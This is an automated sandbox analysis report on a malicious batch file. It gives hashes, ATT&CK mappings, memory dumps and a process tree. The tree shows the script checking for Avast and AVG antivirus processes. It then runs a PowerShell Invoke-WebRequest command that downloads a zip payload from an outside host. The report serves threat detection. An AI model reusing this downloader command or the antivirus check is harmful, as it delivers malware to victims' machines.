8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695

General

Target

8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat
Size

29KB
MD5

af0c16e6a8877ea5a72d5d4a876e8302
SHA1

bc78be8297b41156b56fb22f7a84e7a85a183f7a
SHA256

8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695
SHA512

73ec801912075022dba96acb14b0cf6397b09af73b8e2535bb8870783196fd87ccbcb3f1530151c5c384f05d707d0bc593de33e33a85cb25872648db1884f629
SSDEEP

768:gTYcpQyuPmhDGEhtKC7/ZAmvh3MT2iabBp2KHrxWPylMhQYXTtlE:gTYcpQyuPmhDGEhtKC7BAmvtO2ip88Pk

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2408	powershell.exe
2812	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1264	tasklist.exe
1576	tasklist.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2408	powershell.exe
2812	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1264	tasklist.exe
Token: SeDebugPrivilege	1576	tasklist.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 1264	2848	cmd.exe	32
PID 2848 wrote to memory of 1264	2848	cmd.exe	32
PID 2848 wrote to memory of 1264	2848	cmd.exe	32
PID 2848 wrote to memory of 540	2848	cmd.exe	33
PID 2848 wrote to memory of 540	2848	cmd.exe	33
PID 2848 wrote to memory of 540	2848	cmd.exe	33
PID 2848 wrote to memory of 1576	2848	cmd.exe	35
PID 2848 wrote to memory of 1576	2848	cmd.exe	35
PID 2848 wrote to memory of 1576	2848	cmd.exe	35
PID 2848 wrote to memory of 2096	2848	cmd.exe	36
PID 2848 wrote to memory of 2096	2848	cmd.exe	36
PID 2848 wrote to memory of 2096	2848	cmd.exe	36
PID 2848 wrote to memory of 2408	2848	cmd.exe	37
PID 2848 wrote to memory of 2408	2848	cmd.exe	37
PID 2848 wrote to memory of 2408	2848	cmd.exe	37
PID 2848 wrote to memory of 2812	2848	cmd.exe	38
PID 2848 wrote to memory of 2812	2848	cmd.exe	38
PID 2848 wrote to memory of 2812	2848	cmd.exe	38

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\8620fa4c62bd53e5b70aa10e6205f1ceffcd49bd7ca3b01cbe8f539273dd6695.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1264
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:540
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://goninvoicceme.shop:7070/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

1

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4HM19E03LGAWS6FSC571.temp

Filesize
7KB

MD5
5024d9a5830b7a3ed90266fc8e44408e

SHA1
b0bea51f91d448d8bb127a5e98651bfb4fb715b8

SHA256
e7051e846a424cf117874dfe8486159088627f078b112578521764b2ac52c9eb

SHA512
b1f5b618af0bfdc1e44c0f44000531540c927bc41e4fbfa37e1cf52c3e7187b4f81a7cbd282fec0a87fb878f9708b0eebbf09d3e4d03b02bc4ba31d77a2f6ac8

Download Submit
memory/2408-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

Filesize
4KB

Download
memory/2408-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2408-6-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/2408-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2408-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2408-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2408-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Filesize
9.6MB

Download
memory/2812-16-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2812-17-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing